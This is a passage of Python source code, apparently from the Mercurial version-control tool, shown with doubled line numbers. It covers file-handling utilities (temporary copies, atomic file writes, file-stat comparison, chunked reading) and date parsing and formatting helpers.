1524 # work around issue2543 (or testfile may get lost on Samba shares)
1525 f1, f2, fp = None, None, None
1525 f1, f2, fp = None, None, None
1526 try:
1526 try:
1527 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1527 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1528 suffix='1~', dir=os.path.dirname(testfile))
1528 suffix='1~', dir=os.path.dirname(testfile))
1529 os.close(fd)
1529 os.close(fd)
1530 f2 = '%s2~' % f1[:-2]
1530 f2 = '%s2~' % f1[:-2]
1531
1531
1532 oslink(f1, f2)
1532 oslink(f1, f2)
1533 # nlinks() may behave differently for files on Windows shares if
1533 # nlinks() may behave differently for files on Windows shares if
1534 # the file is open.
1534 # the file is open.
1535 fp = posixfile(f2)
1535 fp = posixfile(f2)
1536 return nlinks(f2) > 1
1536 return nlinks(f2) > 1
1537 except OSError:
1537 except OSError:
1538 return False
1538 return False
1539 finally:
1539 finally:
1540 if fp is not None:
1540 if fp is not None:
1541 fp.close()
1541 fp.close()
1542 for f in (f1, f2):
1542 for f in (f1, f2):
1543 try:
1543 try:
1544 if f is not None:
1544 if f is not None:
1545 os.unlink(f)
1545 os.unlink(f)
1546 except OSError:
1546 except OSError:
1547 pass
1547 pass
1548
1548
1549 def endswithsep(path):
1549 def endswithsep(path):
1550 '''Check path ends with os.sep or os.altsep.'''
1550 '''Check path ends with os.sep or os.altsep.'''
1551 return (path.endswith(pycompat.ossep)
1551 return (path.endswith(pycompat.ossep)
1552 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1552 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1553
1553
1554 def splitpath(path):
1554 def splitpath(path):
1555 '''Split path by os.sep.
1555 '''Split path by os.sep.
1556 Note that this function does not use os.altsep because this is
1556 Note that this function does not use os.altsep because this is
1557 an alternative of simple "xxx.split(os.sep)".
1557 an alternative of simple "xxx.split(os.sep)".
1558 It is recommended to use os.path.normpath() before using this
1558 It is recommended to use os.path.normpath() before using this
1559 function if need.'''
1559 function if need.'''
1560 return path.split(pycompat.ossep)
1560 return path.split(pycompat.ossep)
1561
1561
1562 def gui():
1562 def gui():
1563 '''Are we running in a GUI?'''
1563 '''Are we running in a GUI?'''
1564 if pycompat.sysplatform == 'darwin':
1564 if pycompat.sysplatform == 'darwin':
1565 if 'SSH_CONNECTION' in encoding.environ:
1565 if 'SSH_CONNECTION' in encoding.environ:
1566 # handle SSH access to a box where the user is logged in
1566 # handle SSH access to a box where the user is logged in
1567 return False
1567 return False
1568 elif getattr(osutil, 'isgui', None):
1568 elif getattr(osutil, 'isgui', None):
1569 # check if a CoreGraphics session is available
1569 # check if a CoreGraphics session is available
1570 return osutil.isgui()
1570 return osutil.isgui()
1571 else:
1571 else:
1572 # pure build; use a safe default
1572 # pure build; use a safe default
1573 return True
1573 return True
1574 else:
1574 else:
1575 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1575 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1576
1576
1577 def mktempcopy(name, emptyok=False, createmode=None):
1577 def mktempcopy(name, emptyok=False, createmode=None):
1578 """Create a temporary file with the same contents from name
1578 """Create a temporary file with the same contents from name
1579
1579
1580 The permission bits are copied from the original file.
1580 The permission bits are copied from the original file.
1581
1581
1582 If the temporary file is going to be truncated immediately, you
1582 If the temporary file is going to be truncated immediately, you
1583 can use emptyok=True as an optimization.
1583 can use emptyok=True as an optimization.
1584
1584
1585 Returns the name of the temporary file.
1585 Returns the name of the temporary file.
1586 """
1586 """
1587 d, fn = os.path.split(name)
1587 d, fn = os.path.split(name)
1588 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1588 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1589 os.close(fd)
1589 os.close(fd)
1590 # Temporary files are created with mode 0600, which is usually not
1590 # Temporary files are created with mode 0600, which is usually not
1591 # what we want. If the original file already exists, just copy
1591 # what we want. If the original file already exists, just copy
1592 # its mode. Otherwise, manually obey umask.
1592 # its mode. Otherwise, manually obey umask.
1593 copymode(name, temp, createmode)
1593 copymode(name, temp, createmode)
1594 if emptyok:
1594 if emptyok:
1595 return temp
1595 return temp
1596 try:
1596 try:
1597 try:
1597 try:
1598 ifp = posixfile(name, "rb")
1598 ifp = posixfile(name, "rb")
1599 except IOError as inst:
1599 except IOError as inst:
1600 if inst.errno == errno.ENOENT:
1600 if inst.errno == errno.ENOENT:
1601 return temp
1601 return temp
1602 if not getattr(inst, 'filename', None):
1602 if not getattr(inst, 'filename', None):
1603 inst.filename = name
1603 inst.filename = name
1604 raise
1604 raise
1605 ofp = posixfile(temp, "wb")
1605 ofp = posixfile(temp, "wb")
1606 for chunk in filechunkiter(ifp):
1606 for chunk in filechunkiter(ifp):
1607 ofp.write(chunk)
1607 ofp.write(chunk)
1608 ifp.close()
1608 ifp.close()
1609 ofp.close()
1609 ofp.close()
1610 except: # re-raises
1610 except: # re-raises
1611 try:
1611 try:
1612 os.unlink(temp)
1612 os.unlink(temp)
1613 except OSError:
1613 except OSError:
1614 pass
1614 pass
1615 raise
1615 raise
1616 return temp
1616 return temp
1617
1617
1618 class filestat(object):
1618 class filestat(object):
1619 """help to exactly detect change of a file
1619 """help to exactly detect change of a file
1620
1620
1621 'stat' attribute is result of 'os.stat()' if specified 'path'
1621 'stat' attribute is result of 'os.stat()' if specified 'path'
1622 exists. Otherwise, it is None. This can avoid preparative
1622 exists. Otherwise, it is None. This can avoid preparative
1623 'exists()' examination on client side of this class.
1623 'exists()' examination on client side of this class.
1624 """
1624 """
1625 def __init__(self, stat):
1625 def __init__(self, stat):
1626 self.stat = stat
1626 self.stat = stat
1627
1627
1628 @classmethod
1628 @classmethod
1629 def frompath(cls, path):
1629 def frompath(cls, path):
1630 try:
1630 try:
1631 stat = os.stat(path)
1631 stat = os.stat(path)
1632 except OSError as err:
1632 except OSError as err:
1633 if err.errno != errno.ENOENT:
1633 if err.errno != errno.ENOENT:
1634 raise
1634 raise
1635 stat = None
1635 stat = None
1636 return cls(stat)
1636 return cls(stat)
1637
1637
1638 @classmethod
1638 @classmethod
1639 def fromfp(cls, fp):
1639 def fromfp(cls, fp):
1640 stat = os.fstat(fp.fileno())
1640 stat = os.fstat(fp.fileno())
1641 return cls(stat)
1641 return cls(stat)
1642
1642
1643 __hash__ = object.__hash__
1643 __hash__ = object.__hash__
1644
1644
1645 def __eq__(self, old):
1645 def __eq__(self, old):
1646 try:
1646 try:
1647 # if ambiguity between stat of new and old file is
1647 # if ambiguity between stat of new and old file is
1648 # avoided, comparison of size, ctime and mtime is enough
1648 # avoided, comparison of size, ctime and mtime is enough
1649 # to exactly detect change of a file regardless of platform
1649 # to exactly detect change of a file regardless of platform
1650 return (self.stat.st_size == old.stat.st_size and
1650 return (self.stat.st_size == old.stat.st_size and
1651 self.stat.st_ctime == old.stat.st_ctime and
1651 self.stat.st_ctime == old.stat.st_ctime and
1652 self.stat.st_mtime == old.stat.st_mtime)
1652 self.stat.st_mtime == old.stat.st_mtime)
1653 except AttributeError:
1653 except AttributeError:
1654 pass
1654 pass
1655 try:
1655 try:
1656 return self.stat is None and old.stat is None
1656 return self.stat is None and old.stat is None
1657 except AttributeError:
1657 except AttributeError:
1658 return False
1658 return False
1659
1659
1660 def isambig(self, old):
1660 def isambig(self, old):
1661 """Examine whether new (= self) stat is ambiguous against old one
1661 """Examine whether new (= self) stat is ambiguous against old one
1662
1662
1663 "S[N]" below means stat of a file at N-th change:
1663 "S[N]" below means stat of a file at N-th change:
1664
1664
1665 - S[n-1].ctime < S[n].ctime: can detect change of a file
1665 - S[n-1].ctime < S[n].ctime: can detect change of a file
1666 - S[n-1].ctime == S[n].ctime
1666 - S[n-1].ctime == S[n].ctime
1667 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1667 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1668 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1668 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1669 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1669 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1670 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1670 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1671
1671
1672 Case (*2) above means that a file was changed twice or more at
1672 Case (*2) above means that a file was changed twice or more at
1673 same time in sec (= S[n-1].ctime), and comparison of timestamp
1673 same time in sec (= S[n-1].ctime), and comparison of timestamp
1674 is ambiguous.
1674 is ambiguous.
1675
1675
1676 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1676 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1677 timestamp is ambiguous".
1677 timestamp is ambiguous".
1678
1678
1679 But advancing mtime only in case (*2) doesn't work as
1679 But advancing mtime only in case (*2) doesn't work as
1680 expected, because naturally advanced S[n].mtime in case (*1)
1680 expected, because naturally advanced S[n].mtime in case (*1)
1681 might be equal to manually advanced S[n-1 or earlier].mtime.
1681 might be equal to manually advanced S[n-1 or earlier].mtime.
1682
1682
1683 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1683 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1684 treated as ambiguous regardless of mtime, to avoid overlooking
1684 treated as ambiguous regardless of mtime, to avoid overlooking
1685 by confliction between such mtime.
1685 by confliction between such mtime.
1686
1686
1687 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1687 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1688 S[n].mtime", even if size of a file isn't changed.
1688 S[n].mtime", even if size of a file isn't changed.
1689 """
1689 """
1690 try:
1690 try:
1691 return (self.stat.st_ctime == old.stat.st_ctime)
1691 return (self.stat.st_ctime == old.stat.st_ctime)
1692 except AttributeError:
1692 except AttributeError:
1693 return False
1693 return False
1694
1694
1695 def avoidambig(self, path, old):
1695 def avoidambig(self, path, old):
1696 """Change file stat of specified path to avoid ambiguity
1696 """Change file stat of specified path to avoid ambiguity
1697
1697
1698 'old' should be previous filestat of 'path'.
1698 'old' should be previous filestat of 'path'.
1699
1699
1700 This skips avoiding ambiguity, if a process doesn't have
1700 This skips avoiding ambiguity, if a process doesn't have
1701 appropriate privileges for 'path'. This returns False in this
1701 appropriate privileges for 'path'. This returns False in this
1702 case.
1702 case.
1703
1703
1704 Otherwise, this returns True, as "ambiguity is avoided".
1704 Otherwise, this returns True, as "ambiguity is avoided".
1705 """
1705 """
1706 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1706 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1707 try:
1707 try:
1708 os.utime(path, (advanced, advanced))
1708 os.utime(path, (advanced, advanced))
1709 except OSError as inst:
1709 except OSError as inst:
1710 if inst.errno == errno.EPERM:
1710 if inst.errno == errno.EPERM:
1711 # utime() on the file created by another user causes EPERM,
1711 # utime() on the file created by another user causes EPERM,
1712 # if a process doesn't have appropriate privileges
1712 # if a process doesn't have appropriate privileges
1713 return False
1713 return False
1714 raise
1714 raise
1715 return True
1715 return True
1716
1716
1717 def __ne__(self, other):
1717 def __ne__(self, other):
1718 return not self == other
1718 return not self == other
1719
1719
1720 class atomictempfile(object):
1720 class atomictempfile(object):
1721 '''writable file object that atomically updates a file
1721 '''writable file object that atomically updates a file
1722
1722
1723 All writes will go to a temporary copy of the original file. Call
1723 All writes will go to a temporary copy of the original file. Call
1724 close() when you are done writing, and atomictempfile will rename
1724 close() when you are done writing, and atomictempfile will rename
1725 the temporary copy to the original name, making the changes
1725 the temporary copy to the original name, making the changes
1726 visible. If the object is destroyed without being closed, all your
1726 visible. If the object is destroyed without being closed, all your
1727 writes are discarded.
1727 writes are discarded.
1728
1728
1729 checkambig argument of constructor is used with filestat, and is
1729 checkambig argument of constructor is used with filestat, and is
1730 useful only if target file is guarded by any lock (e.g. repo.lock
1730 useful only if target file is guarded by any lock (e.g. repo.lock
1731 or repo.wlock).
1731 or repo.wlock).
1732 '''
1732 '''
1733 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1733 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1734 self.__name = name # permanent name
1734 self.__name = name # permanent name
1735 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1735 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1736 createmode=createmode)
1736 createmode=createmode)
1737 self._fp = posixfile(self._tempname, mode)
1737 self._fp = posixfile(self._tempname, mode)
1738 self._checkambig = checkambig
1738 self._checkambig = checkambig
1739
1739
1740 # delegated methods
1740 # delegated methods
1741 self.read = self._fp.read
1741 self.read = self._fp.read
1742 self.write = self._fp.write
1742 self.write = self._fp.write
1743 self.seek = self._fp.seek
1743 self.seek = self._fp.seek
1744 self.tell = self._fp.tell
1744 self.tell = self._fp.tell
1745 self.fileno = self._fp.fileno
1745 self.fileno = self._fp.fileno
1746
1746
1747 def close(self):
1747 def close(self):
1748 if not self._fp.closed:
1748 if not self._fp.closed:
1749 self._fp.close()
1749 self._fp.close()
1750 filename = localpath(self.__name)
1750 filename = localpath(self.__name)
1751 oldstat = self._checkambig and filestat.frompath(filename)
1751 oldstat = self._checkambig and filestat.frompath(filename)
1752 if oldstat and oldstat.stat:
1752 if oldstat and oldstat.stat:
1753 rename(self._tempname, filename)
1753 rename(self._tempname, filename)
1754 newstat = filestat.frompath(filename)
1754 newstat = filestat.frompath(filename)
1755 if newstat.isambig(oldstat):
1755 if newstat.isambig(oldstat):
1756 # stat of changed file is ambiguous to original one
1756 # stat of changed file is ambiguous to original one
1757 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1757 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1758 os.utime(filename, (advanced, advanced))
1758 os.utime(filename, (advanced, advanced))
1759 else:
1759 else:
1760 rename(self._tempname, filename)
1760 rename(self._tempname, filename)
1761
1761
1762 def discard(self):
1762 def discard(self):
1763 if not self._fp.closed:
1763 if not self._fp.closed:
1764 try:
1764 try:
1765 os.unlink(self._tempname)
1765 os.unlink(self._tempname)
1766 except OSError:
1766 except OSError:
1767 pass
1767 pass
1768 self._fp.close()
1768 self._fp.close()
1769
1769
1770 def __del__(self):
1770 def __del__(self):
1771 if safehasattr(self, '_fp'): # constructor actually did something
1771 if safehasattr(self, '_fp'): # constructor actually did something
1772 self.discard()
1772 self.discard()
1773
1773
1774 def __enter__(self):
1774 def __enter__(self):
1775 return self
1775 return self
1776
1776
1777 def __exit__(self, exctype, excvalue, traceback):
1777 def __exit__(self, exctype, excvalue, traceback):
1778 if exctype is not None:
1778 if exctype is not None:
1779 self.discard()
1779 self.discard()
1780 else:
1780 else:
1781 self.close()
1781 self.close()
1782
1782
1783 def unlinkpath(f, ignoremissing=False):
1783 def unlinkpath(f, ignoremissing=False):
1784 """unlink and remove the directory if it is empty"""
1784 """unlink and remove the directory if it is empty"""
1785 if ignoremissing:
1785 if ignoremissing:
1786 tryunlink(f)
1786 tryunlink(f)
1787 else:
1787 else:
1788 unlink(f)
1788 unlink(f)
1789 # try removing directories that might now be empty
1789 # try removing directories that might now be empty
1790 try:
1790 try:
1791 removedirs(os.path.dirname(f))
1791 removedirs(os.path.dirname(f))
1792 except OSError:
1792 except OSError:
1793 pass
1793 pass
1794
1794
1795 def tryunlink(f):
1795 def tryunlink(f):
1796 """Attempt to remove a file, ignoring ENOENT errors."""
1796 """Attempt to remove a file, ignoring ENOENT errors."""
1797 try:
1797 try:
1798 unlink(f)
1798 unlink(f)
1799 except OSError as e:
1799 except OSError as e:
1800 if e.errno != errno.ENOENT:
1800 if e.errno != errno.ENOENT:
1801 raise
1801 raise
1802
1802
1803 def makedirs(name, mode=None, notindexed=False):
1803 def makedirs(name, mode=None, notindexed=False):
1804 """recursive directory creation with parent mode inheritance
1804 """recursive directory creation with parent mode inheritance
1805
1805
1806 Newly created directories are marked as "not to be indexed by
1806 Newly created directories are marked as "not to be indexed by
1807 the content indexing service", if ``notindexed`` is specified
1807 the content indexing service", if ``notindexed`` is specified
1808 for "write" mode access.
1808 for "write" mode access.
1809 """
1809 """
1810 try:
1810 try:
1811 makedir(name, notindexed)
1811 makedir(name, notindexed)
1812 except OSError as err:
1812 except OSError as err:
1813 if err.errno == errno.EEXIST:
1813 if err.errno == errno.EEXIST:
1814 return
1814 return
1815 if err.errno != errno.ENOENT or not name:
1815 if err.errno != errno.ENOENT or not name:
1816 raise
1816 raise
1817 parent = os.path.dirname(os.path.abspath(name))
1817 parent = os.path.dirname(os.path.abspath(name))
1818 if parent == name:
1818 if parent == name:
1819 raise
1819 raise
1820 makedirs(parent, mode, notindexed)
1820 makedirs(parent, mode, notindexed)
1821 try:
1821 try:
1822 makedir(name, notindexed)
1822 makedir(name, notindexed)
1823 except OSError as err:
1823 except OSError as err:
1824 # Catch EEXIST to handle races
1824 # Catch EEXIST to handle races
1825 if err.errno == errno.EEXIST:
1825 if err.errno == errno.EEXIST:
1826 return
1826 return
1827 raise
1827 raise
1828 if mode is not None:
1828 if mode is not None:
1829 os.chmod(name, mode)
1829 os.chmod(name, mode)
1830
1830
1831 def readfile(path):
1831 def readfile(path):
1832 with open(path, 'rb') as fp:
1832 with open(path, 'rb') as fp:
1833 return fp.read()
1833 return fp.read()
1834
1834
1835 def writefile(path, text):
1835 def writefile(path, text):
1836 with open(path, 'wb') as fp:
1836 with open(path, 'wb') as fp:
1837 fp.write(text)
1837 fp.write(text)
1838
1838
1839 def appendfile(path, text):
1839 def appendfile(path, text):
1840 with open(path, 'ab') as fp:
1840 with open(path, 'ab') as fp:
1841 fp.write(text)
1841 fp.write(text)
1842
1842
1843 class chunkbuffer(object):
1843 class chunkbuffer(object):
1844 """Allow arbitrary sized chunks of data to be efficiently read from an
1844 """Allow arbitrary sized chunks of data to be efficiently read from an
1845 iterator over chunks of arbitrary size."""
1845 iterator over chunks of arbitrary size."""
1846
1846
1847 def __init__(self, in_iter):
1847 def __init__(self, in_iter):
1848 """in_iter is the iterator that's iterating over the input chunks."""
1848 """in_iter is the iterator that's iterating over the input chunks."""
1849 def splitbig(chunks):
1849 def splitbig(chunks):
1850 for chunk in chunks:
1850 for chunk in chunks:
1851 if len(chunk) > 2**20:
1851 if len(chunk) > 2**20:
1852 pos = 0
1852 pos = 0
1853 while pos < len(chunk):
1853 while pos < len(chunk):
1854 end = pos + 2 ** 18
1854 end = pos + 2 ** 18
1855 yield chunk[pos:end]
1855 yield chunk[pos:end]
1856 pos = end
1856 pos = end
1857 else:
1857 else:
1858 yield chunk
1858 yield chunk
1859 self.iter = splitbig(in_iter)
1859 self.iter = splitbig(in_iter)
1860 self._queue = collections.deque()
1860 self._queue = collections.deque()
1861 self._chunkoffset = 0
1861 self._chunkoffset = 0
1862
1862
1863 def read(self, l=None):
1863 def read(self, l=None):
1864 """Read L bytes of data from the iterator of chunks of data.
1864 """Read L bytes of data from the iterator of chunks of data.
1865 Returns less than L bytes if the iterator runs dry.
1865 Returns less than L bytes if the iterator runs dry.
1866
1866
1867 If size parameter is omitted, read everything"""
1867 If size parameter is omitted, read everything"""
1868 if l is None:
1868 if l is None:
1869 return ''.join(self.iter)
1869 return ''.join(self.iter)
1870
1870
1871 left = l
1871 left = l
1872 buf = []
1872 buf = []
1873 queue = self._queue
1873 queue = self._queue
1874 while left > 0:
1874 while left > 0:
1875 # refill the queue
1875 # refill the queue
1876 if not queue:
1876 if not queue:
1877 target = 2**18
1877 target = 2**18
1878 for chunk in self.iter:
1878 for chunk in self.iter:
1879 queue.append(chunk)
1879 queue.append(chunk)
1880 target -= len(chunk)
1880 target -= len(chunk)
1881 if target <= 0:
1881 if target <= 0:
1882 break
1882 break
1883 if not queue:
1883 if not queue:
1884 break
1884 break
1885
1885
1886 # The easy way to do this would be to queue.popleft(), modify the
1886 # The easy way to do this would be to queue.popleft(), modify the
1887 # chunk (if necessary), then queue.appendleft(). However, for cases
1887 # chunk (if necessary), then queue.appendleft(). However, for cases
1888 # where we read partial chunk content, this incurs 2 dequeue
1888 # where we read partial chunk content, this incurs 2 dequeue
1889 # mutations and creates a new str for the remaining chunk in the
1889 # mutations and creates a new str for the remaining chunk in the
1890 # queue. Our code below avoids this overhead.
1890 # queue. Our code below avoids this overhead.
1891
1891
1892 chunk = queue[0]
1892 chunk = queue[0]
1893 chunkl = len(chunk)
1893 chunkl = len(chunk)
1894 offset = self._chunkoffset
1894 offset = self._chunkoffset
1895
1895
1896 # Use full chunk.
1896 # Use full chunk.
1897 if offset == 0 and left >= chunkl:
1897 if offset == 0 and left >= chunkl:
1898 left -= chunkl
1898 left -= chunkl
1899 queue.popleft()
1899 queue.popleft()
1900 buf.append(chunk)
1900 buf.append(chunk)
1901 # self._chunkoffset remains at 0.
1901 # self._chunkoffset remains at 0.
1902 continue
1902 continue
1903
1903
1904 chunkremaining = chunkl - offset
1904 chunkremaining = chunkl - offset
1905
1905
1906 # Use all of unconsumed part of chunk.
1906 # Use all of unconsumed part of chunk.
1907 if left >= chunkremaining:
1907 if left >= chunkremaining:
1908 left -= chunkremaining
1908 left -= chunkremaining
1909 queue.popleft()
1909 queue.popleft()
1910 # offset == 0 is enabled by block above, so this won't merely
1910 # offset == 0 is enabled by block above, so this won't merely
1911 # copy via ``chunk[0:]``.
1911 # copy via ``chunk[0:]``.
1912 buf.append(chunk[offset:])
1912 buf.append(chunk[offset:])
1913 self._chunkoffset = 0
1913 self._chunkoffset = 0
1914
1914
1915 # Partial chunk needed.
1915 # Partial chunk needed.
1916 else:
1916 else:
1917 buf.append(chunk[offset:offset + left])
1917 buf.append(chunk[offset:offset + left])
1918 self._chunkoffset += left
1918 self._chunkoffset += left
1919 left -= chunkremaining
1919 left -= chunkremaining
1920
1920
1921 return ''.join(buf)
1921 return ''.join(buf)
1922
1922
1923 def filechunkiter(f, size=131072, limit=None):
1923 def filechunkiter(f, size=131072, limit=None):
1924 """Create a generator that produces the data in the file size
1924 """Create a generator that produces the data in the file size
1925 (default 131072) bytes at a time, up to optional limit (default is
1925 (default 131072) bytes at a time, up to optional limit (default is
1926 to read all data). Chunks may be less than size bytes if the
1926 to read all data). Chunks may be less than size bytes if the
1927 chunk is the last chunk in the file, or the file is a socket or
1927 chunk is the last chunk in the file, or the file is a socket or
1928 some other type of file that sometimes reads less data than is
1928 some other type of file that sometimes reads less data than is
1929 requested."""
1929 requested."""
1930 assert size >= 0
1930 assert size >= 0
1931 assert limit is None or limit >= 0
1931 assert limit is None or limit >= 0
1932 while True:
1932 while True:
1933 if limit is None:
1933 if limit is None:
1934 nbytes = size
1934 nbytes = size
1935 else:
1935 else:
1936 nbytes = min(limit, size)
1936 nbytes = min(limit, size)
1937 s = nbytes and f.read(nbytes)
1937 s = nbytes and f.read(nbytes)
1938 if not s:
1938 if not s:
1939 break
1939 break
1940 if limit:
1940 if limit:
1941 limit -= len(s)
1941 limit -= len(s)
1942 yield s
1942 yield s
1943
1943
1944 def makedate(timestamp=None):
1944 def makedate(timestamp=None):
1945 '''Return a unix timestamp (or the current time) as a (unixtime,
1945 '''Return a unix timestamp (or the current time) as a (unixtime,
1946 offset) tuple based off the local timezone.'''
1946 offset) tuple based off the local timezone.'''
1947 if timestamp is None:
1947 if timestamp is None:
1948 timestamp = time.time()
1948 timestamp = time.time()
1949 if timestamp < 0:
1949 if timestamp < 0:
1950 hint = _("check your clock")
1950 hint = _("check your clock")
1951 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1951 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1952 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1952 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1953 datetime.datetime.fromtimestamp(timestamp))
1953 datetime.datetime.fromtimestamp(timestamp))
1954 tz = delta.days * 86400 + delta.seconds
1954 tz = delta.days * 86400 + delta.seconds
1955 return timestamp, tz
1955 return timestamp, tz
1956
1956
1957 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1957 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1958 """represent a (unixtime, offset) tuple as a localized time.
1958 """represent a (unixtime, offset) tuple as a localized time.
1959 unixtime is seconds since the epoch, and offset is the time zone's
1959 unixtime is seconds since the epoch, and offset is the time zone's
1960 number of seconds away from UTC.
1960 number of seconds away from UTC.
1961
1961
1962 >>> datestr((0, 0))
1962 >>> datestr((0, 0))
1963 'Thu Jan 01 00:00:00 1970 +0000'
1963 'Thu Jan 01 00:00:00 1970 +0000'
1964 >>> datestr((42, 0))
1964 >>> datestr((42, 0))
1965 'Thu Jan 01 00:00:42 1970 +0000'
1965 'Thu Jan 01 00:00:42 1970 +0000'
1966 >>> datestr((-42, 0))
1966 >>> datestr((-42, 0))
1967 'Wed Dec 31 23:59:18 1969 +0000'
1967 'Wed Dec 31 23:59:18 1969 +0000'
1968 >>> datestr((0x7fffffff, 0))
1968 >>> datestr((0x7fffffff, 0))
1969 'Tue Jan 19 03:14:07 2038 +0000'
1969 'Tue Jan 19 03:14:07 2038 +0000'
1970 >>> datestr((-0x80000000, 0))
1970 >>> datestr((-0x80000000, 0))
1971 'Fri Dec 13 20:45:52 1901 +0000'
1971 'Fri Dec 13 20:45:52 1901 +0000'
1972 """
1972 """
1973 t, tz = date or makedate()
1973 t, tz = date or makedate()
1974 if "%1" in format or "%2" in format or "%z" in format:
1974 if "%1" in format or "%2" in format or "%z" in format:
1975 sign = (tz > 0) and "-" or "+"
1975 sign = (tz > 0) and "-" or "+"
1976 minutes = abs(tz) // 60
1976 minutes = abs(tz) // 60
1977 q, r = divmod(minutes, 60)
1977 q, r = divmod(minutes, 60)
1978 format = format.replace("%z", "%1%2")
1978 format = format.replace("%z", "%1%2")
1979 format = format.replace("%1", "%c%02d" % (sign, q))
1979 format = format.replace("%1", "%c%02d" % (sign, q))
1980 format = format.replace("%2", "%02d" % r)
1980 format = format.replace("%2", "%02d" % r)
1981 d = t - tz
1981 d = t - tz
1982 if d > 0x7fffffff:
1982 if d > 0x7fffffff:
1983 d = 0x7fffffff
1983 d = 0x7fffffff
1984 elif d < -0x80000000:
1984 elif d < -0x80000000:
1985 d = -0x80000000
1985 d = -0x80000000
1986 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1986 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1987 # because they use the gmtime() system call which is buggy on Windows
1987 # because they use the gmtime() system call which is buggy on Windows
1988 # for negative values.
1988 # for negative values.
1989 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1989 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1990 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1990 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1991 return s
1991 return s
1992
1992
1993 def shortdate(date=None):
1993 def shortdate(date=None):
1994 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1994 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1995 return datestr(date, format='%Y-%m-%d')
1995 return datestr(date, format='%Y-%m-%d')
1996
1996
1997 def parsetimezone(s):
1997 def parsetimezone(s):
1998 """find a trailing timezone, if any, in string, and return a
1998 """find a trailing timezone, if any, in string, and return a
1999 (offset, remainder) pair"""
1999 (offset, remainder) pair"""
2000
2000
2001 if s.endswith("GMT") or s.endswith("UTC"):
2001 if s.endswith("GMT") or s.endswith("UTC"):
2002 return 0, s[:-3].rstrip()
2002 return 0, s[:-3].rstrip()
2003
2003
2004 # Unix-style timezones [+-]hhmm
2004 # Unix-style timezones [+-]hhmm
2005 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2005 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2006 sign = (s[-5] == "+") and 1 or -1
2006 sign = (s[-5] == "+") and 1 or -1
2007 hours = int(s[-4:-2])
2007 hours = int(s[-4:-2])
2008 minutes = int(s[-2:])
2008 minutes = int(s[-2:])
2009 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2009 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2010
2010
2011 # ISO8601 trailing Z
2011 # ISO8601 trailing Z
2012 if s.endswith("Z") and s[-2:-1].isdigit():
2012 if s.endswith("Z") and s[-2:-1].isdigit():
2013 return 0, s[:-1]
2013 return 0, s[:-1]
2014
2014
2015 # ISO8601-style [+-]hh:mm
2015 # ISO8601-style [+-]hh:mm
2016 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2016 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2017 s[-5:-3].isdigit() and s[-2:].isdigit()):
2017 s[-5:-3].isdigit() and s[-2:].isdigit()):
2018 sign = (s[-6] == "+") and 1 or -1
2018 sign = (s[-6] == "+") and 1 or -1
2019 hours = int(s[-5:-3])
2019 hours = int(s[-5:-3])
2020 minutes = int(s[-2:])
2020 minutes = int(s[-2:])
2021 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2021 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2022
2022
2023 return None, s
2023 return None, s
2024
2024
2025 def strdate(string, format, defaults=None):
2025 def strdate(string, format, defaults=None):
2026 """parse a localized time string and return a (unixtime, offset) tuple.
2026 """parse a localized time string and return a (unixtime, offset) tuple.
2027 if the string cannot be parsed, ValueError is raised."""
2027 if the string cannot be parsed, ValueError is raised."""
2028 if defaults is None:
2028 if defaults is None:
2029 defaults = {}
2029 defaults = {}
2030
2030
2031 # NOTE: unixtime = localunixtime + offset
2031 # NOTE: unixtime = localunixtime + offset
2032 offset, date = parsetimezone(string)
2032 offset, date = parsetimezone(string)
2033
2033
2034 # add missing elements from defaults
2034 # add missing elements from defaults
